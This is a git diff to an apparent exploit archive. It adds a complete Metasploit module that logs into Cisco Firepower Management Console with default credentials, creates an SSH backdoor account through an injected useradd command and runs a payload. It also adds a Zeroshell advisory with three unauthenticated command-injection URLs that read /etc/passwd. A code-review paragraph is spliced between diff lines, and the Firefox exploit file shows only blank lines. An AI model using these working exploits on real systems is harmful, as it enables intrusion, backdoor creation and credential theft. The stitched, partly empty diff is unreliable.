diff --git a/files.csv b/files.csv
index 5f103298b..03c2cc7e0 100644
--- a/files.csv
+++ b/files.csv
@@ -5340,6 +5340,7 @@ id,file,description,date,author,platform,type,port
 41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
 41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
 41030,platforms/windows/dos/41030.py,"SapLPD 7.40 - Denial of Service",2016-12-28,"Peter Baris",windows,dos,0
+41042,platforms/windows/dos/41042.html,"Mozilla Firefox < 50.1.0 - Use After Free",2017-01-13,"Marcin Ressel",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15217,6 +15218,7 @@ id,file,description,date,author,platform,type,port
 40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
 41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
 41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
+41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -20445,24 +20447,24 @@ id,file,description,date,author,platform,type,port
 7691,platforms/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,php,webapps,0
 7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
 7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",php,webapps,0
-7699,platforms/php/webapps/7699.txt,"QuoteBook - 'poll.inc' Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0
+7699,platforms/php/webapps/7699.txt,"QuoteBook - Remote Config File Disclosure",2009-01-07,Moudi,php,webapps,0
 7700,platforms/php/webapps/7700.php,"CuteNews 1.4.6 - (ip ban) Cross-Site Scripting / Command Execution (Administrator Required)",2009-01-08,StAkeR,php,webapps,0
-7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - (comment_id) SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
-7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - (visualizza.php idvar) Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
+7703,platforms/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' Parameter SQL Injection",2009-01-08,"Khashayar Fereidani",php,webapps,0
+7704,platforms/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,php,webapps,0
 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 - (mydirname) Remote PHP Code Execution",2009-01-08,StAkeR,php,webapps,0
 7711,platforms/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,php,webapps,0
-7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
+7716,platforms/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - SQL Injection",2009-01-11,EcHoLL,php,webapps,0
 7717,platforms/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
 7718,platforms/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,php,webapps,0
 7719,platforms/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,php,webapps,0
-7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - (products.php pcat) SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
+7722,platforms/php/webapps/7722.txt,"DZcms 3.1 - SQL Injection",2009-01-11,"Glafkos Charalambous",php,webapps,0
 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0
-7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - (id_animateur) Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
-7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection",2009-01-11,stylextra,php,webapps,0
+7724,platforms/php/webapps/7724.php,"phpMDJ 1.0.3 - 'id_animateur' Parameter Blind SQL Injection",2009-01-11,darkjoker,php,webapps,0
+7725,platforms/php/webapps/7725.txt,"XOOPS Module tadbook2 - SQL Injection",2009-01-11,stylextra,php,webapps,0
 7726,platforms/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,php,webapps,0
 7728,platforms/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,php,webapps,0
-7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - 'comment_id' Parameter SQL Injection",2009-01-11,FasTWORM,php,webapps,0
-7730,platforms/php/webapps/7730.txt,"Social Engine - 'browse_classifieds.php s' SQL Injection",2009-01-11,snakespc,php,webapps,0
+7729,platforms/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - SQL Injection",2009-01-11,FasTWORM,php,webapps,0
+7730,platforms/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,php,webapps,0
 7731,platforms/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,php,webapps,0
 7732,platforms/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",php,webapps,0
 7733,platforms/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,php,webapps,0
@@ -36978,3 +36980,4 @@ id,file,description,date,author,platform,type,port
 41036,platforms/php/webapps/41036.txt,"Penny Auction Script - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
 41037,platforms/php/webapps/41037.txt,"ECommerce-TIBSECART - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
 41038,platforms/php/webapps/41038.txt,"ECommerce-Multi-Vendor Software - Arbitrary File Upload",2017-01-11,"Ihsan Sencan",php,webapps,0
+41040,platforms/linux/webapps/41040.txt,"Zeroshell 3.6.0/3.7.0 Net Services - Remote Code Execution",2017-01-13,"Ozer Goker",linux,webapps,0
diff --git a/platforms/linux/remote/41041.rb b/platforms/linux/remote/41041.rb
new file mode 100755
index 000000000..7ce22eac5
--- /dev/null
+++ b/platforms/linux/remote/41041.rb
@@ -0,0 +1,294 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::Remote::SSH
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability found in Cisco Firepower Management Console.
+ The management system contains a configuration flaw that allows the www user to
+ execute the useradd binary, which can be abused to create backdoor accounts.
+ Authentication is required to exploit this vulnerability.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Matt', # Original discovery & PoC
+ 'sinn3r' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2016-6433' ],
+ [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'Targets' =>
+ [
+ [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Oct 10 2016',
+ 'CmdStagerFlavor'=> %w{ echo },
+ 'DefaultOptions' =>
+ {
+ 'SSL' => 'true',
+ 'SSLVersion' => 'Auto',
+ 'RPORT' => 443
+ },
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ # admin:Admin123 is the default credential for 6.0.1
+ OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
+ OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
+ OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),
+ OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),
+ OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
+ OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])
+ ], self.class)
+ end
+
+ def check
+ # For this exploit to work, we need to check two services:
+ # * HTTP - To create the backdoor account for SSH
+ # * SSH - To execute our payload
+
+ vprint_status('Checking Cisco Firepower Management console...')
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')
+ })
+
+ if res && res.code == 200
+ vprint_status("Console is found.")
+ vprint_status("Checking SSH service.")
+ begin
+ ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+ Net::SSH.start(rhost, 'admin',
+ port: datastore['SSHPORT'],
+ password: Rex::Text.rand_text_alpha(5),
+ auth_methods: ['password'],
+ non_interactive: true
+ )
+ end
+ rescue Timeout::Error
+ vprint_error('The SSH connection timed out.')
+ return Exploit::CheckCode::Unknown
+ rescue Net::SSH::AuthenticationFailed
+ # Hey, it talked. So that means SSH is running.
+ return Exploit::CheckCode::Appears
+ rescue Net::SSH::Exception => e
+ vprint_error(e.message)
+ end
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+ def get_sf_action_id(sid)
+ requirements = {}
+
+ print_status('Attempting to obtain sf_action_id from rulesimport.cgi')
+
+ uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'cookie' => "CGISESSID=#{sid}"
+ })
+
+ unless res
+ fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')
+ end
+
+ sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]
+
+ unless sf_action_id
+ fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')
+ end
+
+ sf_action_id
+ end
+
+ def create_ssh_backdoor(sid, user, pass)
+ uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
+ sf_action_id = get_sf_action_id(sid)
+ sh_name = 'exploit.sh'
+
+ print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")
+
+ mime_data = Rex::MIME::Message.new
+ mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')
+ mime_data.add_part('file', nil, nil, 'form-data; name="source"')
+ mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')
+ mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')
+ mime_data.add_part(
+ "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",
+ 'application/octet-stream',
+ nil,
+ "form-data; name=\"file\"; filename=\"#{sh_name}\""
+ )
+
+ send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => "CGISESSID=#{sid}",
+ 'ctype' => "multipart/form-data; boundary=#{mime_data.bound}",
+ 'data' => mime_data.to_s,
+ 'vars_get' => { 'no_mojo' => '1' },
+ })
+ end
+
+ def generate_new_username
+ datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)
+ end
+
+ def generate_new_password
+ datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)
+ end
+
+ def report_cred(opts)
+ service_data = {
+ address: rhost,
+ port: rport,
+ service_name: 'cisco',
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ credential_data = {
+ origin_type: :service,
+ module_fullname: fullname,
+ username: opts[:user],
+ private_data: opts[:password],
+ private_type: :password
+ }.merge(service_data)
+
+ login_data = {
+ last_attempted_at: DateTime.now,
+ core: create_credential(credential_data),
+ status: Metasploit::Model::Login::Status::SUCCESSFUL,
+ proof: opts[:proof]
+ }.merge(service_data)
+
+ create_credential_login(login_data)
+ end
+
+ def do_login
+ console_user = datastore['USERNAME']
+ console_pass = datastore['PASSWORD']
+ uri = normalize_uri(target_uri.path, 'login.cgi')
+
+ print_status("Attempting to login in as #{console_user}:#{console_pass}")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' => {
+ 'username' => console_user,
+ 'password' => console_pass,
+ 'target' => ''
+ }
+ })
+
+ unless res
+ fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
+ end
+
+ res_cookie = res.get_cookies
+ if res.code == 302 && res_cookie.include?('CGISESSID')
+ cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
+ print_status("CGI Session ID: #{cgi_sid}")
+ print_good("Authenticated as #{console_user}:#{console_pass}")
+ report_cred(username: console_user, password: console_pass)
+ return cgi_sid
+ end
+
+ nil
+ end
+
+ def execute_command(cmd, opts = {})
+ @first_exec = true
+ cmd.gsub!(/\/tmp/, '/usr/tmp')
+
+ # Weird hack for the cmd stager.
+ # Because it keeps using > to write the payload.
+ if @first_exec
+ @first_exec = false
+ else
+ cmd.gsub!(/>>/, ' > ')
+ end
+
+ begin
+ Timeout.timeout(3) do
+ @ssh_socket.exec!("#{cmd}\n")
+ vprint_status("Executing #{cmd}")
+ end
+ rescue Timeout::Error
+ fail_with(Failure::Unknown, 'SSH command timed out')
+ rescue Net::SSH::ChannelOpenFailed
+ print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')
+ retry
+ end
+ end
+
+ def init_ssh_session(user, pass)
+ print_status("Attempting to log into SSH as #{user}:#{pass}")
+
+ factory = ssh_socket_factory
+ opts = {
+ auth_methods: ['password', 'keyboard-interactive'],
+ port: datastore['SSHPORT'],
+ use_agent: false,
+ config: false,
+ password: pass,
+ proxy: factory,
+ non_interactive: true
+ }
+
+ opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+ begin
+ ssh = nil
+ ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+ @ssh_socket = Net::SSH.start(rhost, user, opts)
+ end
+ rescue Net::SSH::Exception => e
+ fail_with(Failure::Unknown, e.message)
+ end
+ end
+
+ def exploit
+ # To exploit the useradd vuln, we need to login first.
+ sid = do_login
+ return unless sid
+
+ # After login, we can call the useradd utility to create a backdoor user
+ new_user = generate_new_username
+ new_pass = generate_new_password
+ create_ssh_backdoor(sid, new_user, new_pass)
+
+ # Log into the SSH backdoor account
+ init_ssh_session(new_user, new_pass)
+
+ begin
+ execute_cmdstager({:linemax => 500})
+ ensure
+ @ssh_socket.close
+ end
+ end
+
+end
\ No newline at end of file
diff --git a/platforms/linux/webapps/41040.txt b/platforms/linux/webapps/41040.txt
new file mode 100755
index 000000000..950490bc2
--- /dev/null
+++ b/platforms/linux/webapps/41040.txt
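Review bot: In execute_command the `else` branch that rewrites `>>` can never run, because `@first_exec = true` is reassigned at the top of every call, immediately before the `if @first_exec` test; either the flag should be initialised once (in init_ssh_session, next to `@ssh_socket`) or the branch and its "weird hack" comment should be removed so the method's documentation matches what it actually does. The `retry` in the `Net::SSH::ChannelOpenFailed` rescue is unbounded, so a server that keeps refusing channels leaves the module looping forever; an `attempts = 0` before the `begin` and `attempts += 1; retry if attempts < 3` followed by a fail_with keeps it terminating. Two unused locals should also go: `requirements = {}` in get_sf_action_id and `ssh = nil` in init_ssh_session. The `sf_action_id` extraction takes `.flatten[1]`, the second match on the page, with no comment saying why the first is skipped; a one-line why-comment there would spare the next maintainer from treating it as an off-by-one.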
@@ -0,0 +1,71 @@
+####################################################################################################################################
+# Exploit Title: Zeroshell - Net Services Unauthenticated Remote Code Execution | RCE
+# Date: 13.01.2017
+# Exploit Author: Ozer Goker
+# Vendor Homepage: http://www.zeroshell.org
+# Software Link: www.zeroshell.org/download/
+# Version: 3.6.0 & 3.7.0
+####################################################################################################################################
+
+Introduction
+
+Zeroshell is a small Linux distribution for servers and embedded devices with the aim to provide network services. It is available in the form of live CD or compact Flash image and it can be configured using a web browser. The main features of Zeroshell include: load balancing and failover of multiple Internet connections, UMTS/HSDPA connections by using 3G modems, RADIUS server for providing secure authentication and automatic management of encryption keys to wireless networks, captive portal to support web login, and many others.
+
+
+Vulnerabilities: Unauthenticated Remote Code Execution | RCE
+
+
+RCE details:
+
+####################################################################################################################################
+
+RCE 1
+
+URL
+http://192.168.0.75/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW=
+
+METHOD
+Get,Post
+
+PARAMETER
+User
+
+PAYLOAD
+%27%26cat%20/etc/passwd%26%27
+
+
+####################################################################################################################################
+
+RCE 2
+
+URL
+http://192.168.0.75/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26cat%20/etc/passwd%26%27
+
+METHOD
+Get
+
+PARAMETER
+x509type
+
+PAYLOAD
+%27%26cat%20/etc/passwd%26%27
+
+
+####################################################################################################################################
+
+RCE 3
+
+URL
+http://192.168.0.75/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26cat%20/etc/passwd%26%22
+
+METHOD
+Get
+
+PARAMETER
+type
+
+PAYLOAD
+%22%26cat%20/etc/passwd%26%22
+
+
+####################################################################################################################################
diff --git a/platforms/windows/dos/41042.html b/platforms/windows/dos/41042.html
new file mode 100755
index 000000000..b5330334b
--- /dev/null
+++ b/platforms/windows/dos/41042.html
@@ -0,0 +1,107 @@
+ + +
+ + + + + + + + + +